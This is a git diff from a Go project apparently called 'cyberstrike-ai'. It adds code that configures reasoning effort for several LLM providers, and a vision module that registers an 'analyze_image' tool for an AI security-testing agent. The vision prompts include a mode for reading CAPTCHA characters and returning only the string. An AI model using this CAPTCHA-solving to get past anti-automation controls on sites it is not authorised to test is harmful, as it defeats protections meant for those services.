oa.Model) + return + } + + if mode == "off" { + applyThinkingDisabled(cfg) + return + } + effort := effectiveEffort(sr, client, allowClient) + prof := resolveWireProfile(oa, sr) + + // Admin-defined extra root fields (merged first; automatic keys may follow). + if len(sr.ExtraRequestFields) > 0 { + if cfg.ExtraFields == nil { + cfg.ExtraFields = make(map[string]any) + } + for k, v := range sr.ExtraRequestFields { + cfg.ExtraFields[k] = v + } + } + + switch prof { + case wireClaude, wireNone: + return + case wireDeepseek: + applyDeepseek(cfg, mode, effort) + case wireOutputConfig: + applyOutputConfigEffort(cfg, mode, effort) + default: // wireOpenAI + applyOpenAICompat(cfg, mode, effort) + } +} + +// applyClaudeExtendedThinking sets Anthropic Messages API `thinking` when absent from ExtraRequestFields. +// Uses adaptive + summarized display by default (per Anthropic guidance for Claude 4.x); Sonnet 3.7 uses enabled+budget. +func applyClaudeExtendedThinking(cfg *einoopenai.ChatModelConfig, mode, effort, model string) { + if cfg == nil || mode == "off" { + return + } + if cfg.ExtraFields == nil { + cfg.ExtraFields = make(map[string]any) + } + if _, exists := cfg.ExtraFields["thinking"]; exists { + return + } + m := strings.ToLower(strings.TrimSpace(model)) + thinking := map[string]any{ + "type": "adaptive", + "display": "summarized", + } + // Sonnet 3.7: manual extended thinking is the documented path. + if strings.Contains(m, "claude-3-7-sonnet") || strings.Contains(m, "3-7-sonnet") || strings.Contains(m, "sonnet-3.7") { + thinking = map[string]any{ + "type": "enabled", + "budget_tokens": 10000, + "display": "summarized", + } + } + // Opus 4.7+: manual enabled+budget rejected — keep adaptive only. + if strings.Contains(m, "opus-4-7") || strings.Contains(m, "opus-4.7") { + thinking = map[string]any{ + "type": "adaptive", + "display": "summarized", + } + } + _ = effort // reserved: map to Anthropic effort / output_config when API stabilizes in one place + cfg.ExtraFields["thinking"] = thinking +} + +func effectiveMode(sr *config.OpenAIReasoningConfig, client *ClientIntent, allowClient bool) string { + server := strings.ToLower(strings.TrimSpace(sr.ModeEffective())) + if server == "" || server == "default" { + server = "auto" + } + if !allowClient || client == nil { + return server + } + cm := strings.ToLower(strings.TrimSpace(client.Mode)) + if cm == "" || cm == "default" { + return server + } + return cm +} + +func effectiveEffort(sr *config.OpenAIReasoningConfig, client *ClientIntent, allowClient bool) string { + se := normalizeEffort(sr.Effort) + if !allowClient || client == nil { + return se + } + ce := normalizeEffort(client.Effort) + if ce != "" { + return ce + } + return se +} + +func normalizeEffort(s string) string { + e := strings.ToLower(strings.TrimSpace(s)) + switch e { + case "low", "medium", "high", "max", "xhigh": + return e + default: + return "" + } +} + +// usesExtraFieldsReasoningEffort 为 Eino 无枚举的最高档 effort,经 ExtraFields 原样下发(max / xhigh 由网关自行识别,不做互转)。 +func usesExtraFieldsReasoningEffort(e string) bool { + return e == "max" || e == "xhigh" +} + +func resolveWireProfile(oa *config.OpenAIConfig, sr *config.OpenAIReasoningConfig) wireProfile { + if strings.EqualFold(strings.TrimSpace(oa.Provider), "claude") { + return wireClaude + } + p := strings.ToLower(strings.TrimSpace(sr.ProfileEffective())) + switch p { + case "output_config", "output_config_effort": + return wireOutputConfig + case "openai", "openai_compat": + return wireOpenAI + case "deepseek", "deepseek_compat": + return wireDeepseek + case "auto", "": + bu := strings.ToLower(oa.BaseURL) + mo := strings.ToLower(oa.Model) + if strings.Contains(bu, "deepseek") || strings.Contains(mo, "deepseek") { + return wireDeepseek + } + return wireOpenAI + default: + return wireOpenAI + } +} + +func applyThinkingDisabled(cfg *einoopenai.ChatModelConfig) { + if cfg == nil { + return + } + if cfg.ExtraFields == nil { + cfg.ExtraFields = make(map[string]any) + } + if _, exists := cfg.ExtraFields["thinking"]; exists { + return + } + cfg.ExtraFields["thinking"] = map[string]any{"type": "disabled"} +} + +func applyDeepseek(cfg *einoopenai.ChatModelConfig, mode, effort string) { + // auto: enable thinking for DeepSeek line; on: same; auto without effort still opens thinking. + if mode == "auto" || mode == "on" { + if cfg.ExtraFields == nil { + cfg.ExtraFields = make(map[string]any) + } + cfg.ExtraFields["thinking"] = map[string]any{"type": "enabled"} + } + if effort != "" { + if cfg.ExtraFields == nil { + cfg.ExtraFields = make(map[string]any) + } + cfg.ExtraFields["reasoning_effort"] = effortStringForAPI(effort) + } +} + +func applyOpenAICompat(cfg *einoopenai.ChatModelConfig, mode, effort string) { + if mode == "auto" && effort == "" { + return + } + e := effort + if mode == "on" && e == "" { + e = "medium" + } + if e == "" { + return + } + if usesExtraFieldsReasoningEffort(e) { + if cfg.ExtraFields == nil { + cfg.ExtraFields = make(map[string]any) + } + cfg.ExtraFields["reasoning_effort"] = effortStringForAPI(e) + return + } + switch e { + case "low": + cfg.ReasoningEffort = einoopenai.ReasoningEffortLevelLow + case "medium": + cfg.ReasoningEffort = einoopenai.ReasoningEffortLevelMedium + case "high": + cfg.ReasoningEffort = einoopenai.ReasoningEffortLevelHigh + } +} + +func applyOutputConfigEffort(cfg *einoopenai.ChatModelConfig, mode, effort string) { + if mode == "auto" && effort == "" { + return + } + e := effort + if mode == "on" && e == "" { + e = "high" + } + if e == "" { + return + } + if cfg.ExtraFields == nil { + cfg.ExtraFields = make(map[string]any) + } + cfg.ExtraFields["output_config"] = map[string]any{"effort": effortStringForAPI(e)} +} + +func effortStringForAPI(e string) string { + // 原样透传:OpenAI 官方多为 xhigh,部分兼容网关为 max,由配置/对话 effort 选择。 + return strings.ToLower(strings.TrimSpace(e)) +} diff --git a/internal/reasoning/eino_test.go b/internal/reasoning/eino_test.go new file mode 100644 index 00000000..5f23646f --- /dev/null +++ b/internal/reasoning/eino_test.go @@ -0,0 +1,82 @@ +package reasoning + +import ( + "testing" + + "cyberstrike-ai/internal/config" + + einoopenai "github.com/cloudwego/eino-ext/components/model/openai" +) + +func TestEffortStringForAPI_passthrough(t *testing.T) { + cases := map[string]string{ + "max": "max", + "xhigh": "xhigh", + "HIGH": "high", + "Medium": "medium", + } + for in, want := range cases { + if got := effortStringForAPI(in); got != want { + t.Fatalf("%q -> %q, want %q", in, got, want) + } + } +} + +func TestNormalizeEffort_maxAndXhigh(t *testing.T) { + if normalizeEffort("xhigh") != "xhigh" { + t.Fatal("xhigh not accepted") + } + if normalizeEffort("max") != "max" { + t.Fatal("max not accepted") + } +} + +func TestApplyOpenAICompat_xhighExtraField(t *testing.T) { + cfg := &einoopenai.ChatModelConfig{} + oa := &config.OpenAIConfig{ + Reasoning: config.OpenAIReasoningConfig{ + Profile: "openai_compat", + Mode: "on", + Effort: "xhigh", + }, + } + ApplyToEinoChatModelConfig(cfg, oa, nil) + if cfg.ExtraFields == nil { + t.Fatal("expected ExtraFields") + } + if got, _ := cfg.ExtraFields["reasoning_effort"].(string); got != "xhigh" { + t.Fatalf("reasoning_effort=%q", got) + } +} + +func TestApplyReasoningOff_disablesThinking(t *testing.T) { + cfg := &einoopenai.ChatModelConfig{} + oa := &config.OpenAIConfig{ + BaseURL: "https://api.openai.com/v1", + Model: "gpt-4o", + Reasoning: config.OpenAIReasoningConfig{ + Mode: "off", + }, + } + ApplyToEinoChatModelConfig(cfg, oa, nil) + th, ok := cfg.ExtraFields["thinking"].(map[string]any) + if !ok || th["type"] != "disabled" { + t.Fatalf("expected thinking disabled, got %#v", cfg.ExtraFields) + } +} + +func TestApplyOpenAICompat_maxPassthrough(t *testing.T) { + cfg := &einoopenai.ChatModelConfig{} + oa := &config.OpenAIConfig{ + Reasoning: config.OpenAIReasoningConfig{ + Profile: "openai_compat", + Mode: "on", + Effort: "max", + }, + } + ApplyToEinoChatModelConfig(cfg, oa, nil) + got, _ := cfg.ExtraFields["reasoning_effort"].(string) + if got != "max" { + t.Fatalf("max effort wire=%q, want max", got) + } +} diff --git a/internal/vision/client.go b/internal/vision/client.go new file mode 100644 index 00000000..dbbe52b7 --- /dev/null +++ b/internal/vision/client.go @@ -0,0 +1,132 @@ +package vision + +import ( + "context" + "encoding/base64" + "fmt" + "net" + "net/http" + "strings" + "time" + + "cyberstrike-ai/internal/config" + "cyberstrike-ai/internal/openai" + + einoopenai "github.com/cloudwego/eino-ext/components/model/openai" + "github.com/cloudwego/eino/schema" +) + +// Client 调用独立 Vision ChatModel(单次 Generate)。 +type Client struct { + cfg config.VisionConfig + mainOA config.OpenAIConfig +} + +// NewClient 构造视觉客户端。 +func NewClient(visionCfg config.VisionConfig, mainOpenAI config.OpenAIConfig) *Client { + return &Client{cfg: visionCfg, mainOA: mainOpenAI} +} + +// Analyze 将图片字节送入 VL 模型并返回文本描述。 +func (c *Client) Analyze(ctx context.Context, img ImagePayload, question string) (string, error) { + if len(img.Bytes) == 0 { + return "", fmt.Errorf("empty image payload") + } + mime := strings.TrimSpace(img.MIMEType) + if mime == "" { + mime = "image/jpeg" + } + oa := c.cfg.OpenAICfgEffective(c.mainOA) + if strings.TrimSpace(oa.APIKey) == "" { + return "", fmt.Errorf("vision API key is empty (set vision.api_key or openai.api_key)") + } + if strings.TrimSpace(oa.Model) == "" { + return "", fmt.Errorf("vision model is empty") + } + + timeout := time.Duration(c.cfg.TimeoutSecondsEffective()) * time.Second + ctx, cancel := context.WithTimeout(ctx, timeout) + defer cancel() + + httpClient := &http.Client{ + Timeout: timeout + 15*time.Second, + Transport: &http.Transport{ + DialContext: (&net.Dialer{ + Timeout: 60 * time.Second, + KeepAlive: 60 * time.Second, + }).DialContext, + ResponseHeaderTimeout: timeout + 10*time.Second, + }, + } + httpClient = openai.NewEinoHTTPClient(&oa, httpClient) + + modelCfg := &einoopenai.ChatModelConfig{ + APIKey: oa.APIKey, + BaseURL: strings.TrimSuffix(oa.BaseURL, "/"), + Model: oa.Model, + HTTPClient: httpClient, + } + chatModel, err := einoopenai.NewChatModel(ctx, modelCfg) + if err != nil { + return "", fmt.Errorf("vision chat model: %w", err) + } + + b64 := base64.StdEncoding.EncodeToString(img.Bytes) + detail := schema.ImageURLDetailLow + switch c.cfg.DetailEffective() { + case "high": + detail = schema.ImageURLDetailHigh + case "auto": + detail = schema.ImageURLDetailAuto + } + + prompt := buildVisionPrompt(question) + userMsg := &schema.Message{ + Role: schema.User, + UserInputMultiContent: []schema.MessageInputPart{ + {Type: schema.ChatMessagePartTypeText, Text: prompt}, + { + Type: schema.ChatMessagePartTypeImageURL, + Image: &schema.MessageInputImage{ + MessagePartCommon: schema.MessagePartCommon{ + Base64Data: &b64, + MIMEType: mime, + }, + Detail: detail, + }, + }, + }, + } + + resp, err := chatModel.Generate(ctx, []*schema.Message{userMsg}) + if err != nil { + return "", fmt.Errorf("vision generate: %w", err) + } + if resp == nil || strings.TrimSpace(resp.Content) == "" { + return "", fmt.Errorf("vision model returned empty content") + } + return strings.TrimSpace(resp.Content), nil +} + +func buildVisionPrompt(question string) string { + q := strings.TrimSpace(question) + if q == "" { + q = "请对图片做通用描述,侧重授权安全测试场景(可见文本、表单、按钮、验证码、错误信息、技术栈线索)。" + } + extra := "" + if looksLikeCaptchaQuestion(q) { + extra = "\n若为验证码:仅输出你辨认出的字符序列,不要空格、标点、解释;看不清则明确说无法识别。" + } + return `你是授权安全测试助手。请根据图片回答用户问题,只描述你能从图中确认的内容,不要编造。 +用户问题:` + q + extra +} + +func looksLikeCaptchaQuestion(q string) bool { + s := strings.ToLower(q) + for _, kw := range []string{"验证码", "captcha", "verification code", "verify code", "vcode", "图形码"} { + if strings.Contains(s, kw) { + return true + } + } + return strings.Contains(s, "只输出") && (strings.Contains(s, "字符") || strings.Contains(s, "character")) +} diff --git a/internal/vision/client_test.go b/internal/vision/client_test.go new file mode 100644 index 00000000..101aa943 --- /dev/null +++ b/internal/vision/client_test.go @@ -0,0 +1,12 @@ +package vision + +import "testing" + +func TestLooksLikeCaptchaQuestion(t *testing.T) { + if !looksLikeCaptchaQuestion("识别验证码,只输出字符") { + t.Fatal("expected captcha hint") + } + if looksLikeCaptchaQuestion("描述登录页布局") { + t.Fatal("expected non-captcha") + } +} diff --git a/internal/vision/path.go b/internal/vision/path.go new file mode 100644 index 00000000..3d9756ed --- /dev/null +++ b/internal/vision/path.go @@ -0,0 +1,72 @@ +package vision + +import ( + "fmt" + "os" + "path/filepath" + "strings" +) + +var allowedImageExt = map[string]struct{}{ + ".png": {}, ".jpg": {}, ".jpeg": {}, ".webp": {}, ".gif": {}, + ".bmp": {}, ".tif": {}, ".tiff": {}, +} + +// ResolveImagePath 解析并校验可读图片路径(支持任意目录;仍校验扩展名与常规文件)。 +func ResolveImagePath(path string, cwd string) (string, error) { + p := strings.TrimSpace(path) + if p == "" { + return "", fmt.Errorf("path is empty") + } + cwdTrim := strings.TrimSpace(cwd) + if cwdTrim == "" { + var err error + cwdTrim, err = os.Getwd() + if err != nil { + return "", fmt.Errorf("getwd: %w", err) + } + } + cwdAbs, err := filepath.Abs(filepath.Clean(cwdTrim)) + if err != nil { + return "", err + } + + var candidate string + if filepath.IsAbs(p) { + candidate = filepath.Clean(p) + } else { + candidate = filepath.Clean(filepath.Join(cwdAbs, p)) + } + resolved := normalizeAbsPath(candidate) + if resolved == "" { + return "", fmt.Errorf("invalid path") + } + + ext := strings.ToLower(filepath.Ext(resolved)) + if _, ok := allowedImageExt[ext]; !ok { + return "", fmt.Errorf("unsupported image extension %q", ext) + } + + st, err := os.Stat(resolved) + if err != nil { + return "", fmt.Errorf("stat: %w", err) + } + if st.IsDir() { + return "", fmt.Errorf("not a regular file") + } + if st.Size() > 0 && st.Size() > 1<<30 { + return "", fmt.Errorf("file too large on disk") + } + return resolved, nil +} + +func normalizeAbsPath(p string) string { + abs, err := filepath.Abs(filepath.Clean(p)) + if err != nil { + return "" + } + if link, err := filepath.EvalSymlinks(abs); err == nil { + return link + } + return abs +} diff --git a/internal/vision/path_test.go b/internal/vision/path_test.go new file mode 100644 index 00000000..b38206bf --- /dev/null +++ b/internal/vision/path_test.go @@ -0,0 +1,52 @@ +package vision + +import ( + "os" + "path/filepath" + "testing" +) + +func TestResolveImagePath_underCWD(t *testing.T) { + dir := t.TempDir() + img := filepath.Join(dir, "shot.png") + if err := os.WriteFile(img, []byte{0x89, 0x50, 0x4e, 0x47}, 0o644); err != nil { + t.Fatal(err) + } + got, err := ResolveImagePath(img, dir) + if err != nil { + t.Fatal(err) + } + want := normalizeAbsPath(img) + if got != want { + t.Fatalf("got %q want %q", got, want) + } +} + +func TestResolveImagePath_absoluteOutsideCWD(t *testing.T) { + dir := t.TempDir() + cwd := t.TempDir() + img := filepath.Join(dir, "remote.png") + if err := os.WriteFile(img, []byte{0x89, 0x50, 0x4e, 0x47}, 0o644); err != nil { + t.Fatal(err) + } + got, err := ResolveImagePath(img, cwd) + if err != nil { + t.Fatalf("expected absolute path outside cwd to be allowed: %v", err) + } + want := normalizeAbsPath(img) + if got != want { + t.Fatalf("got %q want %q", got, want) + } +} + +func TestResolveImagePath_rejectsNonImageExt(t *testing.T) { + dir := t.TempDir() + f := filepath.Join(dir, "notes.txt") + if err := os.WriteFile(f, []byte("x"), 0o644); err != nil { + t.Fatal(err) + } + _, err := ResolveImagePath(f, dir) + if err == nil { + t.Fatal("expected error for non-image extension") + } +} diff --git a/internal/vision/preprocess.go b/internal/vision/preprocess.go new file mode 100644 index 00000000..860dab63 --- /dev/null +++ b/internal/vision/preprocess.go @@ -0,0 +1,212 @@ +package vision + +import ( + "bytes" + "fmt" + "image" + "os" + "strings" + + "github.com/disintegration/imaging" +) + +// ImagePayload 送入 VL API 的图片字节与 MIME。 +type ImagePayload struct { + Bytes []byte + MIMEType string +} + +// PreprocessMeta 记录缩放与编码结果,供工具输出与排障。 +type PreprocessMeta struct { + OriginalPath string + OriginalBytes int64 + OriginalWidth int + OriginalHeight int + OutputWidth int + OutputHeight int + OutputBytes int + OutputMIMEType string + JPEGQuality int // 0 表示未 JPEG 重编码(原图直传) + PreprocessMode string // passthrough | jpeg +} + +// PreprocessOptions 图片预处理参数。 +type PreprocessOptions struct { + MaxImageBytes int64 + MaxDimension int + JPEGQuality int + MaxPayloadBytes int64 + SkipPreprocessBelowBytes int64 // 0 = 始终压缩;>0 时小图+尺寸合规可直传 +} + +// PreprocessImageFile 读取图片;大图或超尺寸走 imaging 缩放+JPEG,否则可原图直传。 +func PreprocessImageFile(path string, opt PreprocessOptions) (ImagePayload, PreprocessMeta, error) { + var meta PreprocessMeta + meta.OriginalPath = path + + st, err := os.Stat(path) + if err != nil { + return ImagePayload{}, meta, err + } + meta.OriginalBytes = st.Size() + if opt.MaxImageBytes > 0 && st.Size() > opt.MaxImageBytes { + return ImagePayload{}, meta, fmt.Errorf("file size %d exceeds max_image_bytes %d", st.Size(), opt.MaxImageBytes) + } + + cfgW, cfgH, format, err := imageDimensions(path) + if err != nil { + return ImagePayload{}, meta, err + } + meta.OriginalWidth = cfgW + meta.OriginalHeight = cfgH + + maxDim := opt.MaxDimension + if maxDim <= 0 { + maxDim = 2048 + } + maxPayload := opt.MaxPayloadBytes + if maxPayload <= 0 { + maxPayload = 512 * 1024 + } + + if payload, meta, ok, err := tryPassthrough(path, st.Size(), cfgW, cfgH, format, opt, maxDim, maxPayload); ok { + return payload, meta, err + } + + return compressWithImaging(path, opt, maxDim, maxPayload, meta) +} + +func tryPassthrough(path string, size int64, w, h int, format string, opt PreprocessOptions, maxDim int, maxPayload int64) (ImagePayload, PreprocessMeta, bool, error) { + var meta PreprocessMeta + meta.OriginalPath = path + meta.OriginalBytes = size + meta.OriginalWidth = w + meta.OriginalHeight = h + + threshold := opt.SkipPreprocessBelowBytes + if threshold <= 0 { + return ImagePayload{}, meta, false, nil + } + if size > threshold { + return ImagePayload{}, meta, false, nil + } + longEdge := w + if h > longEdge { + longEdge = h + } + if longEdge > maxDim { + return ImagePayload{}, meta, false, nil + } + if size > maxPayload { + return ImagePayload{}, meta, false, nil + } + + raw, err := os.ReadFile(path) + if err != nil { + return ImagePayload{}, meta, false, err + } + mime := mimeFromImageFormat(format) + if mime == "" { + return ImagePayload{}, meta, false, nil + } + + meta.OutputWidth = w + meta.OutputHeight = h + meta.OutputBytes = len(raw) + meta.OutputMIMEType = mime + meta.PreprocessMode = "passthrough" + return ImagePayload{Bytes: raw, MIMEType: mime}, meta, true, nil +} + +func compressWithImaging(path string, opt PreprocessOptions, maxDim int, maxPayload int64, meta PreprocessMeta) (ImagePayload, PreprocessMeta, error) { + src, err := imaging.Open(path) + if err != nil { + return ImagePayload{}, meta, fmt.Errorf("open image: %w", err) + } + bounds := src.Bounds() + meta.OriginalWidth = bounds.Dx() + meta.OriginalHeight = bounds.Dy() + + dst := imaging.Fit(src, maxDim, maxDim, imaging.Lanczos) + outBounds := dst.Bounds() + meta.OutputWidth = outBounds.Dx() + meta.OutputHeight = outBounds.Dy() + + quality := opt.JPEGQuality + if quality <= 0 || quality > 100 { + quality = 82 + } + + dim := maxDim + for attempt := 0; attempt < 6; attempt++ { + if attempt > 0 { + dim = int(float64(dim) * 0.85) + if dim < 256 { + dim = 256 + } + dst = imaging.Fit(src, dim, dim, imaging.Lanczos) + outBounds = dst.Bounds() + meta.OutputWidth = outBounds.Dx() + meta.OutputHeight = outBounds.Dy() + } + q := quality + for q >= 60 { + var buf bytes.Buffer + if err := imaging.Encode(&buf, dst, imaging.JPEG, imaging.JPEGQuality(q)); err != nil { + return ImagePayload{}, meta, fmt.Errorf("encode jpeg: %w", err) + } + if int64(buf.Len()) <= maxPayload { + meta.JPEGQuality = q + meta.OutputBytes = buf.Len() + meta.OutputMIMEType = "image/jpeg" + meta.PreprocessMode = "jpeg" + return ImagePayload{Bytes: buf.Bytes(), MIMEType: "image/jpeg"}, meta, nil + } + q -= 5 + } + quality = 75 + } + return ImagePayload{}, meta, fmt.Errorf("could not compress image under max_payload_bytes %d", maxPayload) +} + +func imageDimensions(path string) (w, h int, format string, err error) { + f, err := os.Open(path) + if err != nil { + return 0, 0, "", err + } + defer f.Close() + cfg, format, err := image.DecodeConfig(f) + if err != nil { + return 0, 0, "", fmt.Errorf("decode image config: %w", err) + } + return cfg.Width, cfg.Height, format, nil +} + +func mimeFromImageFormat(format string) string { + switch strings.ToLower(strings.TrimSpace(format)) { + case "jpeg", "jpg": + return "image/jpeg" + case "png": + return "image/png" + case "gif": + return "image/gif" + case "webp": + return "image/webp" + case "bmp": + return "image/bmp" + case "tiff": + return "image/tiff" + default: + return "" + } +} + +// DecodeImageConfig 用于测试:确认文件可被解码。 +func DecodeImageConfig(path string) (image.Config, string, error) { + f, err := os.Open(path) + if err != nil { + return image.Config{}, "", err + } + defer f.Close() + return image.DecodeConfig(f) +} diff --git a/internal/vision/preprocess_test.go b/internal/vision/preprocess_test.go new file mode 100644 index 00000000..a9b9e068 --- /dev/null +++ b/internal/vision/preprocess_test.go @@ -0,0 +1,109 @@ +package vision + +import ( + "image" + "image/color" + "image/png" + "os" + "path/filepath" + "testing" + + "github.com/disintegration/imaging" +) + +func TestPreprocessImageFile_scalesAndLimitsPayload(t *testing.T) { + dir := t.TempDir() + path := filepath.Join(dir, "big.png") + img := imaging.New(3000, 2000, color.White) + if err := imaging.Save(img, path); err != nil { + t.Fatal(err) + } + + out, meta, err := PreprocessImageFile(path, PreprocessOptions{ + MaxImageBytes: 10 * 1024 * 1024, + MaxDimension: 1024, + JPEGQuality: 85, + MaxPayloadBytes: 600 * 1024, + SkipPreprocessBelowBytes: 0, + }) + if err != nil { + t.Fatal(err) + } + if len(out.Bytes) == 0 { + t.Fatal("empty output") + } + if meta.PreprocessMode != "jpeg" { + t.Fatalf("mode: %s", meta.PreprocessMode) + } + if meta.OutputWidth > 1024 || meta.OutputHeight > 1024 { + t.Fatalf("expected fit within 1024, got %dx%d", meta.OutputWidth, meta.OutputHeight) + } + if int64(len(out.Bytes)) > 600*1024 { + t.Fatalf("payload %d exceeds max", len(out.Bytes)) + } +} + +func TestPreprocessImageFile_passthroughSmallPNG(t *testing.T) { + dir := t.TempDir() + path := filepath.Join(dir, "small.png") + if err := imaging.Save(imaging.New(400, 300, color.White), path); err != nil { + t.Fatal(err) + } + + out, meta, err := PreprocessImageFile(path, PreprocessOptions{ + MaxImageBytes: 5 * 1024 * 1024, + MaxDimension: 2048, + MaxPayloadBytes: 512 * 1024, + SkipPreprocessBelowBytes: 2 * 1024 * 1024, + }) + if err != nil { + t.Fatal(err) + } + if meta.PreprocessMode != "passthrough" { + t.Fatalf("expected passthrough, got %s", meta.PreprocessMode) + } + if out.MIMEType != "image/png" { + t.Fatalf("mime: %s", out.MIMEType) + } + if meta.OutputWidth != 400 || meta.OutputHeight != 300 { + t.Fatalf("dims: %dx%d", meta.OutputWidth, meta.OutputHeight) + } +} + +func TestPreprocessImageFile_passthroughDisabled(t *testing.T) { + dir := t.TempDir() + path := filepath.Join(dir, "small.png") + if err := imaging.Save(imaging.New(100, 100, color.White), path); err != nil { + t.Fatal(err) + } + + _, meta, err := PreprocessImageFile(path, PreprocessOptions{ + MaxDimension: 2048, + MaxPayloadBytes: 512 * 1024, + SkipPreprocessBelowBytes: 0, + }) + if err != nil { + t.Fatal(err) + } + if meta.PreprocessMode != "jpeg" { + t.Fatalf("expected jpeg compress, got %s", meta.PreprocessMode) + } +} + +func TestPreprocessImageFile_rejectsOversizeFile(t *testing.T) { + dir := t.TempDir() + path := filepath.Join(dir, "tiny.png") + f, err := os.Create(path) + if err != nil { + t.Fatal(err) + } + if err := png.Encode(f, image.NewRGBA(image.Rect(0, 0, 2, 2))); err != nil { + t.Fatal(err) + } + f.Close() + + _, _, err = PreprocessImageFile(path, PreprocessOptions{MaxImageBytes: 1}) + if err == nil { + t.Fatal("expected error when file exceeds max_image_bytes") + } +} diff --git a/internal/vision/tool.go b/internal/vision/tool.go new file mode 100644 index 00000000..db1c2bc6 --- /dev/null +++ b/internal/vision/tool.go @@ -0,0 +1,125 @@ +package vision + +import ( + "context" + "fmt" + "os" + "strings" + + "cyberstrike-ai/internal/config" + "cyberstrike-ai/internal/mcp" + "cyberstrike-ai/internal/mcp/builtin" + + "go.uber.org/zap" +) + +// RegisterAnalyzeImageTool 在 vision.enabled 且 model 已配置时注册 MCP 工具 analyze_image。 +func RegisterAnalyzeImageTool(mcpServer *mcp.Server, cfg *config.Config, logger *zap.Logger) { + if mcpServer == nil || cfg == nil { + return + } + if !cfg.Vision.Ready() { + if cfg.Vision.Enabled && logger != nil { + logger.Warn("vision.enabled 但 vision.model 为空,跳过注册 analyze_image") + } + return + } + + cwd, err := os.Getwd() + if err != nil { + if logger != nil { + logger.Warn("vision: getwd failed, skip analyze_image", zap.Error(err)) + } + return + } + + preOpt := PreprocessOptions{ + MaxImageBytes: cfg.Vision.MaxImageBytesEffective(), + MaxDimension: cfg.Vision.MaxDimensionEffective(), + JPEGQuality: cfg.Vision.JPEGQualityEffective(), + MaxPayloadBytes: cfg.Vision.MaxPayloadBytesEffective(), + SkipPreprocessBelowBytes: cfg.Vision.SkipPreprocessBelowBytesEffective(), + } + client := NewClient(cfg.Vision, cfg.OpenAI) + + tool := mcp.Tool{ + Name: builtin.ToolAnalyzeImage, + Description: "分析服务器上的本地图片并返回文字描述(验证码、UI 元素、报错、架构图要点等)。" + + "输入为文件路径(如用户上传的 chat_uploads 路径或工具截图路径)。" + + "输出仅为文本,不含图片数据。不要对二进制图片使用 read_file 指望理解内容。", + ShortDescription: "分析本地图片并返回文字描述(验证码/UI/报错等)", + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "path": map[string]interface{}{ + "type": "string", + "description": "图片绝对路径或相对于进程工作目录的路径", + }, + "question": map[string]interface{}{ + "type": "string", + "description": "可选:希望模型重点回答的问题。验证码图建议:只输出验证码字符,不要空格和解释", + }, + }, + "required": []string{"path"}, + }, + } + + handler := func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) { + path, _ := args["path"].(string) + question, _ := args["question"].(string) + + abs, err := ResolveImagePath(path, cwd) + if err != nil { + return textResult(fmt.Sprintf("路径校验失败: %v", err), true), nil + } + + img, meta, err := PreprocessImageFile(abs, preOpt) + if err != nil { + return textResult(fmt.Sprintf("图片预处理失败: %v", err), true), nil + } + + summary, err := client.Analyze(ctx, img, question) + if err != nil { + return textResult(fmt.Sprintf("视觉模型调用失败: %v", err), true), nil + } + + body := formatAnalysisResult(abs, meta, summary) + return textResult(body, false), nil + } + + mcpServer.RegisterTool(tool, handler) + if logger != nil { + logger.Info("vision: analyze_image 工具已注册", zap.String("model", cfg.Vision.Model)) + } +} + +func textResult(text string, isError bool) *mcp.ToolResult { + return &mcp.ToolResult{ + Content: []mcp.Content{{Type: "text", Text: text}}, + IsError: isError, + } +} + +func formatAnalysisResult(path string, meta PreprocessMeta, summary string) string { + var b strings.Builder + b.WriteString("## Image analysis\n") + b.WriteString("- **path**: ") + b.WriteString(path) + b.WriteString("\n") + switch meta.PreprocessMode { + case "passthrough": + b.WriteString(fmt.Sprintf("- **preprocess**: passthrough %dx%d, %s, %dKB (original %dKB)\n\n", + meta.OutputWidth, meta.OutputHeight, meta.OutputMIMEType, + (meta.OutputBytes+1023)/1024, (meta.OriginalBytes+1023)/1024)) + default: + b.WriteString(fmt.Sprintf("- **preprocess**: %dx%d → %dx%d, jpeg q=%d, %dKB (original %dKB)\n\n", + meta.OriginalWidth, meta.OriginalHeight, + meta.OutputWidth, meta.OutputHeight, + meta.JPEGQuality, (meta.OutputBytes+1023)/1024, + (meta.OriginalBytes+1023)/1024)) + } + b.WriteString("### Summary\n") + b.WriteString(strings.TrimSpace(summary)) + b.WriteString("\n") + return b.String() +}